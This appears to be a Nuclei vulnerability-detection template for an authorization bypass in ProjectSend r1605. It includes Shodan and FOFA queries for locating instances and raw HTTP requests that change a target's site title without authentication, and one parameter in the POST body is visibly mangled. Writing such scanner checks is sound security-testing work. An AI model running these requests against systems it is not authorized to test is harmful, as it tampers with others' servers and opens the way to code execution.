64 lines
1.9 KiB
YAML
64 lines
1.9 KiB
YAML
id: projectsend-auth-bypass
|
|
|
|
info:
|
|
name: ProjectSend <= r1605 - Improper Authorization
|
|
author: DhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application.
|
|
reference:
|
|
- https://www.projectsend.org/
|
|
- https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: body="ProjectSend"
|
|
shodan-query: html:"ProjectSend"
|
|
tags: misconfig,projectsend,auth-bypass
|
|
|
|
variables:
|
|
string: "{{randstr}}"
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(body, "projectsend")'
|
|
condition: and
|
|
internal: true
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: csrf
|
|
group: 1
|
|
regex:
|
|
- 'name="csrf_token" value="([0-9a-z]+)"'
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /options.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
csrf_token={{csrf}}§ion=general&this_install_title={{string}}
|
|
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_2 == 200'
|
|
- 'contains(body_2, "{{string}}")'
|
|
condition: and
|
|
# digest: 4b0a00483046022100cbdf7867367646663d0f95096da7ed83173ecc5ad6edfbbb81fffd3afe8efcfa0221009cbb5bae0b46406c68174051fdff85191ee72553de70ffbb7e575a1b6c4b4aa1:922c64590222798bb761d5b6d8e72950 |